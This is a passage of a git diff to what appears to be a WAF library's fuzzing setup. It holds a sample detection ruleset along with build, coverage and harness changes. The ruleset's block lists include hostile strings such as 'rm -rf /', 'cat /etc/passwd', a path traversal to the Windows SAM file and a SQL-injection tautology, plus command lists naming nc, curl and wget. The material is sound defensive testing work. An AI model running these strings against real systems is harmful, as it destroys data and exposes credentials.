"private", + "confidential", + "internal", + "staging", + "development", + "test", + "debug", + "trace", + "log", + "error", + "exception", + "exploit", + "payload", + "shellcode", + "backdoor", + "injection", + "xss", + "csrf", + "ssrf", + "lfi", + "rfi", + "sqli", + "traversal", + "bypass", + "evasion", + "obfuscation", + "encoding", + "ssl", + "tls", + "https", + "ssh", + "ftp", + "smtp", + "dns", + "ldap", + "oauth", + "jwt", + "saml" + ] + } + } + ], + "transformers": ["lowercase", "url_decode"], + "on_match": ["block"] + }, + { + "id": "phrase-match-word-boundary-rule", + "name": "Phrase matching with word boundaries", + "tags": { + "type": "security_scanner", + "category": "sql_keywords" + }, + "conditions": [ + { + "operator": "phrase_match", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "server.db.statement" + } + ], + "list": [ + "SELECT", + "INSERT", + "UPDATE", + "DELETE", + "DROP", + "CREATE", + "ALTER", + "TRUNCATE", + "UNION", + "JOIN", + "WHERE", + "FROM", + "INTO", + "VALUES", + "SET", + "ORDER", + "GROUP", + "HAVING", + "LIMIT", + "OFFSET", + "INDEX", + "TABLE", + "DATABASE", + "SCHEMA", + "VIEW", + "PROCEDURE", + "FUNCTION", + "TRIGGER", + "GRANT", + "REVOKE", + "COMMIT", + "ROLLBACK", + "EXEC", + "EXECUTE", + "CAST", + "CONVERT", + "SUBSTRING", + "CONCAT", + "LENGTH", + "UPPER", + "LOWER", + "TRIM", + "REPLACE", + "LIKE", + "REGEXP", + "MATCH" + ], + "enforce_word_boundary": true + } + } + ], + "transformers": ["uppercase"], + "on_match": ["block"] + }, + { + "id": "xss-detector-rule", + "name": "XSS detection rule", + "tags": { + "type": "security_scanner", + "category": "xss" + }, + "conditions": [ + { + "operator": "is_xss", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "server.request.headers.no_cookies" + } + ] + } + } + ], + "transformers": ["html_entity_decode", "url_decode"], + "on_match": ["block"] + }, + { + "id": "sqli-detector-rule", + "name": "SQL injection detection rule", + "tags": { + "type": "security_scanner", + "category": "sqli" + }, + "conditions": [ + { + "operator": "is_sqli", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "server.db.statement" + } + ] + } + } + ], + "transformers": ["lowercase", "url_decode", "remove_comments"], + "on_match": ["block"] + }, + { + "id": "sqli-detector-v2-rule", + "name": "Advanced SQL injection detection with tokenizer", + "tags": { + "type": "security_scanner", + "category": "sqli" + }, + "conditions": [ + { + "operator": "sqli_detector@v2", + "parameters": { + "resource": [ + { + "address": "server.db.statement" + } + ], + "params": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + } + ], + "db_type": [ + { + "address": "server.db.system" + } + ] + } + } + ], + "on_match": ["block"] + }, + { + "id": "shell-injection-rule", + "name": "Shell injection detection with tokenizer", + "tags": { + "type": "security_scanner", + "category": "shell_injection" + }, + "conditions": [ + { + "operator": "shi_detector@v1", + "parameters": { + "resource": [ + { + "address": "server.request.query" + } + ], + "params": [ + { + "address": "server.request.body" + } + ] + } + } + ], + "on_match": ["block"] + }, + { + "id": "exact-match-rule", + "name": "Exact match for common attacks", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "exact_match", + "parameters": { + "inputs": [ + { + "address": "server.request.uri_raw" + }, + { + "address": "server.request.query" + } + ], + "list": [ + "/etc/passwd", + "/etc/shadow", + "../../../../etc/passwd", + "..\\..\\..\\windows\\system32\\config\\sam", + "SELECT * FROM users", + "1' OR '1'='1", + "", + "javascript:alert(1)", + "", + "rm -rf /", + "cat /etc/passwd" + ] + } + } + ], + "on_match": ["block"] + }, + { + "id": "ip-match-rule", + "name": "IP address matching rule", + "tags": { + "type": "security_scanner", + "category": "network_security" + }, + "conditions": [ + { + "operator": "ip_match", + "parameters": { + "inputs": [ + { + "address": "http.client_ip" + }, + { + "address": "server.io.net.url" + } + ], + "list": [ + "127.0.0.1", + "10.0.0.0/8", + "192.168.0.0/16", + "172.16.0.0/12", + "169.254.0.0/16", + "::1", + "fc00::/7" + ] + } + } + ], + "on_match": ["block"] + }, + { + "id": "exists-rule", + "name": "Parameter existence check", + "tags": { + "type": "security_scanner", + "category": "parameter_validation" + }, + "conditions": [ + { + "operator": "exists", + "parameters": { + "inputs": [ + { + "address": "server.request.cookies" + }, + { + "address": "server.request.headers.no_cookies" + } + ] + } + } + ], + "on_match": ["monitor"] + }, + { + "id": "url-transformer-rule", + "name": "URL path and querystring transformer testing", + "tags": { + "type": "security_scanner", + "category": "url_analysis" + }, + "conditions": [ + { + "operator": "phrase_match", + "parameters": { + "inputs": [ + { + "address": "server.request.uri_raw" + }, + { + "address": "server.request.query" + } + ], + "list": [ + "admin", + "config", + "backup", + "test", + "debug", + "api", + "login", + "auth", + "password", + "secret" + ] + } + } + ], + "transformers": ["url_path", "url_querystring", "url_decode"], + "on_match": ["block"] + }, + { + "id": "encoding-transformer-rule", + "name": "Various encoding transformer testing", + "tags": { + "type": "security_scanner", + "category": "encoding_attacks" + }, + "conditions": [ + { + "operator": "phrase_match", + "parameters": { + "inputs": [ + { + "address": "server.request.body" + }, + { + "address": "server.request.headers.no_cookies" + } + ], + "list": [ + "script", + "alert", + "eval", + "javascript", + "vbscript", + "onload", + "onerror", + "onclick", + "onmouseover", + "iframe", + "object", + "embed", + "applet", + "meta", + "link", + "style", + "img", + "svg", + "xml", + "xsl" + ] + } + } + ], + "transformers": [ + "base64_decode", + "html_entity_decode", + "css_decode", + "unicode_normalize" + ], + "on_match": ["block"] + }, + { + "id": "shell-transformer-rule", + "name": "Shell and command injection transformer testing", + "tags": { + "type": "security_scanner", + "category": "command_injection" + }, + "conditions": [ + { + "operator": "phrase_match", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + } + ], + "list": [ + "bash", + "sh", + "cmd", + "powershell", + "system", + "exec", + "eval", + "popen", + "subprocess", + "shell_exec", + "passthru", + "proc_open", + "backticks", + "cat", + "ls", + "pwd", + "whoami", + "id", + "uname", + "netstat", + "ps", + "kill", + "chmod", + "chown", + "rm", + "mv", + "cp", + "mkdir", + "rmdir", + "wget", + "curl", + "nc", + "ncat", + "telnet", + "ssh", + "scp", + "rsync" + ] + } + } + ], + "transformers": ["shell_unescape", "remove_nulls", "compress_whitespace"], + "on_match": ["block"] + }, + { + "id": "base64-encoder-rule", + "name": "Base64 encoding transformer testing", + "tags": { + "type": "security_scanner", + "category": "encoding_detection" + }, + "conditions": [ + { + "operator": "phrase_match", + "parameters": { + "inputs": [ + { + "address": "server.request.body" + }, + { + "address": "server.request.headers.no_cookies" + } + ], + "list": [ + "payload", + "exploit", + "shellcode", + "backdoor", + "trojan", + "malware", + "virus", + "worm", + "rootkit", + "keylogger", + "spyware", + "adware", + "ransomware", + "cryptolocker", + "petya", + "wannacry", + "stuxnet", + "conficker", + "zeus", + "banking", + "credential", + "stealer", + "botnet", + "c2", + "command", + "control" + ] + } + } + ], + "transformers": ["base64_encode", "compress_whitespace", "remove_nulls"], + "on_match": ["block"] + }, + { + "id": "ip-data-rule", + "name": "Rule using IP data", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "ip_match", + "parameters": { + "inputs": [ + { + "address": "http.client_ip" + } + ], + "data": "blocked_ips" + } + } + ], + "on_match": ["block_request_action"] + }, + { + "id": "user-data-rule", + "name": "Rule using user data", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "exact_match", + "parameters": { + "inputs": [ + { + "address": "usr.id" + } + ], + "data": "blocked_users" + } + } + ], + "on_match": ["redirect_action"] + }, + { + "id": "comprehensive-transformer-rule", + "name": "Multiple transformer combination testing", + "tags": { + "type": "security_scanner", + "category": "comprehensive_analysis" + }, + "conditions": [ + { + "operator": "exact_match", + "parameters": { + "inputs": [ + { + "address": "server.request.uri_raw" + }, + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + } + ], + "list": [ + "test", + "admin", + "root", + "config", + "backup", + "debug", + "trace", + "log", + "error", + "exception", + "stack", + "dump", + "core", + "crash" + ] + } + } + ], + "transformers": [ + "url_decode", + "html_entity_decode", + "css_decode", + "base64_decode", + "shell_unescape", + "unicode_normalize", + "remove_nulls", + "compress_whitespace", + "lowercase" + ], + "on_match": ["monitor"] + }, + { + "id": "hidden-ascii-rule", + "name": "Hidden ASCII character detection", + "tags": { + "type": "security_scanner", + "category": "hidden_chars" + }, + "conditions": [ + { + "operator": "hidden_ascii_match", + "parameters": { + "inputs": [ + { + "address": "server.request.uri_raw" + }, + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "server.request.headers.no_cookies" + } + ] + } + } + ], + "on_match": ["block"] + }, + { + "id": "equals-string-rule", + "name": "String equality matching", + "tags": { + "type": "security_scanner", + "category": "exact_string_match" + }, + "conditions": [ + { + "operator": "equals", + "parameters": { + "inputs": [ + { + "address": "server.request.method" + }, + { + "address": "server.request.uri_raw" + }, + { + "address": "server.request.query" + } + ], + "type": "string", + "value": "admin" + } + } + ], + "on_match": ["block"] + }, + { + "id": "equals-signed-int-rule", + "name": "Signed integer equality matching", + "tags": { + "type": "security_scanner", + "category": "numeric_match" + }, + "conditions": [ + { + "operator": "equals", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "signed_number", + "value": -1 + } + } + ], + "on_match": ["block"] + }, + { + "id": "equals-unsigned-int-rule", + "name": "Unsigned integer equality matching", + "tags": { + "type": "security_scanner", + "category": "numeric_match" + }, + "conditions": [ + { + "operator": "equals", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "unsigned_number", + "value": 0 + } + } + ], + "on_match": ["block"] + }, + { + "id": "equals-bool-rule", + "name": "Boolean equality matching", + "tags": { + "type": "security_scanner", + "category": "boolean_match" + }, + "conditions": [ + { + "operator": "equals", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.session_id" + } + ], + "type": "boolean", + "value": true + } + } + ], + "on_match": ["block"] + }, + { + "id": "equals-float-rule", + "name": "Float equality matching", + "tags": { + "type": "security_scanner", + "category": "numeric_match" + }, + "conditions": [ + { + "operator": "equals", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "float", + "value": 3.14159 + } + } + ], + "on_match": ["block"] + }, + { + "id": "lower-than-signed-rule", + "name": "Lower than comparison for signed integers", + "tags": { + "type": "security_scanner", + "category": "numeric_comparison" + }, + "conditions": [ + { + "operator": "lower_than", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "signed_number", + "value": 0 + } + } + ], + "on_match": ["block"] + }, + { + "id": "lower-than-unsigned-rule", + "name": "Lower than comparison for unsigned integers", + "tags": { + "type": "security_scanner", + "category": "numeric_comparison" + }, + "conditions": [ + { + "operator": "lower_than", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "unsigned_number", + "value": 100 + } + } + ], + "on_match": ["block"] + }, + { + "id": "lower-than-float-rule", + "name": "Lower than comparison for floats", + "tags": { + "type": "security_scanner", + "category": "numeric_comparison" + }, + "conditions": [ + { + "operator": "lower_than", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "float", + "value": 10.5 + } + } + ], + "on_match": ["block"] + }, + { + "id": "greater-than-signed-rule", + "name": "greater than comparison for signed integers", + "tags": { + "type": "security_scanner", + "category": "numeric_comparison" + }, + "conditions": [ + { + "operator": "greater_than", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "signed_number", + "value": 1000 + } + } + ], + "on_match": ["block"] + }, + { + "id": "greater-than-unsigned-rule", + "name": "greater than comparison for unsigned integers", + "tags": { + "type": "security_scanner", + "category": "numeric_comparison" + }, + "conditions": [ + { + "operator": "greater_than", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "unsigned_number", + "value": 1000 + } + } + ], + "on_match": ["block"] + }, + { + "id": "greater-than-float-rule", + "name": "greater than comparison for floats", + "tags": { + "type": "security_scanner", + "category": "numeric_comparison" + }, + "conditions": [ + { + "operator": "greater_than", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "float", + "value": 100.5 + } + } + ], + "on_match": ["block"] + } + ], + "processors": [ + { + "id": "http-endpoint-fingerprint", + "generator": "http_endpoint_fingerprint", + "conditions": [], + "evaluate": true, + "output": true, + "parameters": { + "mappings": [ + { + "method": [ + { + "address": "server.request.method" + } + ], + "uri_raw": [ + { + "address": "server.request.uri_raw" + } + ], + "output": "_dd.appsec.fp.http.endpoint" + } + ] + } + }, + { + "id": "http-header-fingerprint", + "generator": "http_header_fingerprint", + "conditions": [], + "evaluate": true, + "output": true, + "parameters": { + "mappings": [ + { + "headers": [ + { + "address": "server.request.headers.no_cookies" + } + ], + "output": "_dd.appsec.fp.http.header" + } + ] + } + }, + { + "id": "http-network-fingerprint", + "generator": "http_network_fingerprint", + "conditions": [], + "evaluate": true, + "output": true, + "parameters": { + "mappings": [ + { + "headers": [ + { + "address": "server.request.headers.no_cookies" + } + ], + "output": "_dd.appsec.fp.http.network" + } + ] + } + }, + { + "id": "session-fingerprint", + "generator": "session_fingerprint", + "conditions": [], + "evaluate": true, + "output": true, + "parameters": { + "mappings": [ + { + "cookies": [ + { + "address": "server.request.cookies" + } + ], + "session_id": [ + { + "address": "usr.session_id" + } + ], + "user_id": [ + { + "address": "usr.id" + } + ], + "output": "_dd.appsec.fp.session" + } + ] + } + }, + { + "id": "jwt-decode", + "generator": "jwt_decode", + "conditions": [], + "evaluate": true, + "output": true, + "parameters": { + "mappings": [ + { + "jwt": [ + { + "address": "server.request.headers.no_cookies", + "key_path": ["authorization"] + } + ], + "output": "_dd.appsec.jwt" + } + ] + } + }, + { + "id": "jwt-decode-002", + "generator": "jwt_decode", + "conditions": [], + "parameters": { + "mappings": [ + { + "inputs": [ + { + "address": "server.request.headers.no_cookies", + "key_path": ["authorization"] + } + ], + "output": "server.request.jwt" + } + ] + }, + "evaluate": false, + "output": true + }, + { + "id": "extract-schema", + "generator": "extract_schema", + "conditions": [], + "evaluate": true, + "output": true, + "parameters": { + "mappings": [ + { + "data": [ + { + "address": "server.request.body" + } + ], + "output": "_dd.appsec.schema" + } + ] + } + }, + { + "id": "lfi-detector-rule", + "name": "Local File Inclusion Detection", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "lfi_detector@v2", + "parameters": { + "resource": [ + { + "address": "server.io.fs.file" + } + ], + "params": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + } + ] + } + } + ], + "on_match": ["block_request_action"] + }, + { + "id": "cmdi-detector-rule", + "name": "Command Injection Detection", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "cmdi_detector@v1", + "parameters": { + "resource": [ + { + "address": "server.request.uri_raw" + } + ], + "params": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + } + ] + } + } + ], + "on_match": ["generate_stack_action"] + }, + { + "id": "ssrf-detector-rule", + "name": "Server-Side Request Forgery Detection", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "ssrf_detector@v2", + "parameters": { + "resource": [ + { + "address": "server.request.uri_raw" + } + ], + "params": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "server.io.net.url" + } + ] + } + } + ], + "on_match": ["redirect_action"] + }, + { + "id": "shell-command-array-rule", + "name": "Shell Command Array Detection", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "shi_detector@v1", + "parameters": { + "inputs": [ + { + "address": "server.request.body", + "key_path": ["command"] + } + ] + } + } + ], + "on_match": ["block_request_action"] + }, + { + "id": "cmdi-command-array-rule", + "name": "Command Injection via Array Detection", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "cmdi_detector@v1", + "parameters": { + "resource": [ + { + "address": "server.sys.exec.cmd", + "key_path": ["command"] + } + ], + "params": [ + { + "address": "server.request.query" + } + ] + } + } + ], + "on_match": ["generate_stack_action"] + } + ], + "exclusions": [ + { + "id": "health-check-exclusion", + "conditions": [ + { + "operator": "exact_match", + "parameters": { + "inputs": [ + { + "address": "server.request.uri_raw" + } + ], + "list": ["/health", "/status", "/ping"] + } + } + ] + }, + { + "id": "rule-filter-bypass-exclusion", + "rules_target": [ + { + "rule_id": "basic-regex-rule" + } + ], + "conditions": [ + { + "operator": "exact_match", + "parameters": { + "inputs": [ + { + "address": "usr.id" + } + ], + "list": ["admin", "root", "system"] + } + } + ], + "on_match": "bypass" + }, + { + "id": "rule-filter-monitor-exclusion", + "rules_target": [ + { + "rule_id": "phrase-match-rule" + }, + { + "rule_id": "xss-detector-rule" + } + ], + "conditions": [ + { + "operator": "phrase_match", + "parameters": { + "inputs": [ + { + "address": "server.request.headers.no_cookies" + } + ], + "list": ["test", "debug", "staging"] + } + } + ], + "on_match": "monitor" + }, + { + "id": "rule-filter-by-tags-exclusion", + "rules_target": [ + { + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + } + } + ], + "conditions": [ + { + "operator": "ip_match", + "parameters": { + "inputs": [ + { + "address": "http.client_ip" + } + ], + "list": ["127.0.0.1", "10.0.0.0/8", "192.168.0.0/16"] + } + } + ], + "on_match": "bypass" + }, + { + "id": "unconditional-rule-filter", + "rules_target": [ + { + "rule_id": "equals-string-rule" + } + ] + }, + { + "id": "input-filter-simple", + "rules_target": [ + { + "rule_id": "sqli-detector-rule" + } + ], + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + } + ] + }, + { + "id": "input-filter-with-key-path", + "rules_target": [ + { + "rule_id": "phrase-match-word-boundary-rule" + } + ], + "inputs": [ + { + "address": "server.request.headers.no_cookies", + "key_path": ["authorization"] + }, + { + "address": "server.request.cookies", + "key_path": ["session"] + } + ] + }, + { + "id": "input-filter-conditional", + "rules_target": [ + { + "rule_id": "shell-injection-rule" + } + ], + "inputs": [ + { + "address": "server.request.query" + } + ], + "conditions": [ + { + "operator": "equals", + "parameters": { + "inputs": [ + { + "address": "usr.id" + } + ], + "type": "string", + "value": "testuser" + } + } + ] + }, + { + "id": "input-filter-wildcard", + "rules_target": [ + { + "rule_id": "hidden-ascii-rule" + } + ], + "inputs": [ + { + "address": "server.request.headers.no_cookies", + "key_path": ["*"] + } + ] + }, + { + "id": "input-filter-nested-path", + "rules_target": [ + { + "rule_id": "lower-than-signed-rule" + } + ], + "inputs": [ + { + "address": "server.request.body", + "key_path": ["data", "user", "profile"] + } + ] + } + ], + "actions": [ + { + "id": "block_request_action", + "type": "block_request", + "parameters": { + "status_code": 403, + "type": "auto", + "grpc_status_code": 10 + } + }, + { + "id": "redirect_action", + "type": "redirect_request", + "parameters": { + "status_code": 302, + "location": "https://www.datadoghq.com" + } + }, + { + "id": "generate_stack_action", + "type": "generate_stack", + "parameters": {} + } + ], + "scanners": [ + { + "id": "email_scanner", + "key": { + "operator": "match_regex", + "parameters": { + "regex": "email" + } + }, + "tags": { + "type": "email", + "category": "pii" + } + }, + { + "id": "phone_scanner", + "value": { + "operator": "match_regex", + "parameters": { + "regex": "\\+?[1-9]\\d{1,14}" + } + }, + "tags": { + "type": "phone", + "category": "pii" + } + }, + { + "id": "ssn_scanner", + "key": { + "operator": "match_regex", + "parameters": { + "regex": "ssn" + } + }, + "value": { + "operator": "match_regex", + "parameters": { + "regex": "\\d{3}-\\d{2}-\\d{4}" + } + }, + "tags": { + "type": "ssn", + "category": "pii" + } + } + ], + "rules_data": [ + { + "id": "blocked_ips", + "type": "ip_with_expiration", + "data": [ + { + "value": "192.168.1.100", + "expiration": 1735689600 + }, + { + "value": "10.0.0.50", + "expiration": 1735689600 + } + ] + }, + { + "id": "blocked_users", + "type": "data_with_expiration", + "data": [ + { + "value": "baduser", + "expiration": 1735689600 + }, + { + "value": "spammer", + "expiration": 1735689600 + } + ] + } + ], + "rules_override": [ + { + "rules_target": [ + { + "rule_id": "basic-regex-rule" + } + ], + "enabled": false + }, + { + "rules_target": [ + { + "tags": { + "type": "security_scanner" + } + } + ], + "on_match": ["redirect_action"] + }, + { + "rules_target": [ + { + "tags": { + "category": "attack_attempt" + } + } + ], + "enabled": false, + "on_match": ["generate_stack_action"] + } + ], + "processors_override": [ + { + "target": [ + { + "id": "extract-schema" + } + ], + "scanners": [ + { + "id": "email_scanner" + } + ] + }, + { + "target": [ + { + "id": "jwt-decode" + } + ], + "scanners": [ + { + "tags": { + "type": "phone" + } + } + ] + }, + { + "target": [ + { + "tags": { + "type": "fingerprint" + } + } + ], + "scanners": [ + { + "id": "ssn_scanner" + } + ] + } + ] +} diff --git a/fuzzer/global/build.sh b/fuzzer/global/build.sh deleted file mode 100755 index 612b78f13..000000000 --- a/fuzzer/global/build.sh +++ /dev/null @@ -1,13 +0,0 @@ -#!/bin/bash -set -eu - -export CC=clang-17 -export CXX=clang++-17 - -rm -rf build && mkdir build && cd build - -cmake -DCMAKE_VERBOSE_MAKEFILE=1 -DCMAKE_BUILD_TYPE=RelWithDebInfo .. - -make -j $(nproc) global_fuzzer - -cp fuzzer/global_fuzzer ../fuzzer/global/ diff --git a/fuzzer/global/corpus/.gitkeep b/fuzzer/global/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/global/corpus/3f786850e387550fdab836ed7e6dc881de23001b b/fuzzer/global/corpus/3f786850e387550fdab836ed7e6dc881de23001b new file mode 100644 index 000000000..789819226 --- /dev/null +++ b/fuzzer/global/corpus/3f786850e387550fdab836ed7e6dc881de23001b @@ -0,0 +1 @@ +a diff --git a/fuzzer/global/scripts/build_corpus.py b/fuzzer/global/scripts/build_corpus.py index 11684b05f..680c62be8 100755 --- a/fuzzer/global/scripts/build_corpus.py +++ b/fuzzer/global/scripts/build_corpus.py @@ -192,22 +192,40 @@ class InitPayloadGenerator: # Arrays max sizes condition_max_count = 8 - rule_max_count = 100 - filter_max_count = 100 + rule_max_count = 20 + filter_max_count = 20 key_path_max_count = 10 - address_max_count = 16 + address_max_count = 8 transformation_max_count = 10 - ip_max_count = 100 + ip_max_count = 10 operators = [ "match_regex", + "!match_regex", "phrase_match", + "!phrase_match", "is_xss", + "!is_xss", "is_sqli", + "!is_sqli", "exact_match", - "ip_match" + "ip_match", + "greater_than", + "less_than", + "equal", + "contains", + "lfi_detector@v1" + "lfi_detector@v2" + "sqli_detector@v1" + "sqli_detector@v2" + "ssrf_detector@v1" + "shi_detector@v1" + "lfi_detector" + "sqli_detector" + "ssrf_detector" + "shi_detector" ] def __init__(self): @@ -274,8 +292,8 @@ def get_random_rule(): "id": get_random_rule_id(), "name": get_random_rule_name(), "tags": { - "type": "".join(choices(printable_chars, k=10)), - "crs_id": "".join(choices(printable_chars, k=10)), + "type": "".join(choices(printable_chars, k=5)), + "crs_id": "".join(choices(printable_chars, k=5)), }, "on_match": get_random_action_array(), "conditions": get_random_condition_array(), @@ -390,7 +408,7 @@ def get_random_condition(i): } if operator == "phrase_match": - result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(1, 200))] + result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(0, 5))] result["parameters"]["options"] = { "enforce_word_boundary": choice((True, False)) } @@ -407,17 +425,17 @@ def get_random_condition(i): } elif operator == "is_xss": # TODO: get interesting XSS patterns - result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(1, 200))] + result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(0, 5))] elif operator == "is_sqli": # TODO: get interesting SQLI patterns - result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(1, 200))] + result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(0, 5))] elif operator == "exact_match": - result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(1, 200))] + result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(0, 5))] elif operator == "ip_match": - result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(1, 200))] + result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(0, 5))] return result diff --git a/fuzzer/global/scripts/clean.sh b/fuzzer/global/scripts/clean.sh index a8c9dc07c..34ae7d786 100755 --- a/fuzzer/global/scripts/clean.sh +++ b/fuzzer/global/scripts/clean.sh @@ -3,7 +3,6 @@ set -eu cd fuzzer/global -rm -rf corpus/ rm -f fuzz-*.log rm -f sample_dict.txt sample_rules.yml rm -f default.profdata default.profraw coverage.html diff --git a/fuzzer/global/scripts/show_coverage.sh b/fuzzer/global/scripts/show_coverage.sh index f58354155..5c7434067 100755 --- a/fuzzer/global/scripts/show_coverage.sh +++ b/fuzzer/global/scripts/show_coverage.sh @@ -1,15 +1,23 @@ #!/bin/bash set -eu -cd fuzzer/global +FUZZ_PATH=/workspace/fuzzer/build/global_fuzz +AFL_OUTPUT_DIR=/workspace/o +PROFDATA_PATH=/workspace/o/cov/lcov/default.profdata -llvm-profdata-17 merge -sparse *.profraw -o default.profdata -llvm-cov-17 show global_fuzzer -instr-profile=default.profdata -ignore-filename-regex="(vendor|fuzzer|third_party)" -format=html > coverage.html -llvm-cov-17 report -instr-profile default.profdata global_fuzzer -ignore-filename-regex="(vendor|fuzzer|third_party)" -show-region-summary=false +# https://github.com/airbus-seclab/afl-cov-fast +/opt/afl-cov-fast/afl-cov-fast.py -c . -m llvm -e $FUZZ_PATH -b $FUZZ_PATH -d $AFL_OUTPUT_DIR -j $(nproc) -O + +# llvm-profdata-19 merge -sparse *.profraw -o default.profdata +llvm-cov-19 report -instr-profile=$PROFDATA_PATH $FUZZ_PATH -ignore-filename-regex="(vendor|fuzzer|third_party)" -show-region-summary=false + +echo "--------------------------------" +echo "You can open o/cov/web/index.html in your browser to see the coverage report in a human friendly way" +echo "--------------------------------" if [ ! -z ${1:-} ]; then THRESHOLD=$1 - TOTAL=$(llvm-cov-17 report -instr-profile default.profdata global_fuzzer -ignore-filename-regex="(vendor|fuzzer|third_party)" -show-region-summary=false | grep TOTAL) + TOTAL=$(llvm-cov-19 report -instr-profile=$PROFDATA_PATH $FUZZ_PATH -ignore-filename-regex="(vendor|fuzzer|third_party)" -show-region-summary=false | grep TOTAL) ARRAY=($TOTAL) COVERAGE=$(echo ${ARRAY[3]} | sed -e "s/\.[[:digit:]]*%//g") diff --git a/fuzzer/global/src/interface.cpp b/fuzzer/global/src/interface.cpp index 8adec50c5..beb3814de 100644 --- a/fuzzer/global/src/interface.cpp +++ b/fuzzer/global/src/interface.cpp @@ -10,6 +10,7 @@ #include #include +#include "embedded_rules.hpp" #include "helpers.hpp" #include "interface.hpp" @@ -84,7 +85,11 @@ ddwaf_handle init_waf() {R"((p(ass)?w(or)?d|pass(_?phrase)?|secret|(api_?|private_?|public_?)key)|token|consumer_?(id|key|secret)|sign(ed|ature)|bearer|authorization)", R"(^(?:\d[ -]*?){13,16}$)"}, ddwaf_object_free}; - ddwaf_object rule = file_to_object("sample_rules.yml"); + + // Use embedded YAML instead of loading from file + YAML::Node doc = YAML::Load(std::string{embedded_rules::sample_rules_yaml}); + ddwaf_object rule = doc.as(); + ddwaf_object ruleset_info; ddwaf_handle handle = ddwaf_init(&rule, &config, &ruleset_info); ddwaf_object_free(&rule); diff --git a/fuzzer/global/src/main.cpp b/fuzzer/global/src/main.cpp index 9b053a0d0..8d4e1e3c0 100644 --- a/fuzzer/global/src/main.cpp +++ b/fuzzer/global/src/main.cpp @@ -15,6 +15,7 @@ #include #include +#include "../common/afl_wrapper.hpp" #include "helpers.hpp" #include "interface.hpp" #include "object_builder.hpp" @@ -127,3 +128,6 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) runner->push(args, ephemeral, timeLeftInUs); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("global_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/http_endpoint_fingerprint/corpus/.gitkeep b/fuzzer/http_endpoint_fingerprint/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/http_endpoint_fingerprint/src/main.cpp b/fuzzer/http_endpoint_fingerprint/src/main.cpp index a6dc9fb81..790bfbabd 100644 --- a/fuzzer/http_endpoint_fingerprint/src/main.cpp +++ b/fuzzer/http_endpoint_fingerprint/src/main.cpp @@ -2,22 +2,31 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "processor/fingerprint.hpp" #include -#include "common.hpp" -#include - using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) +{ + // Set up memory resource + 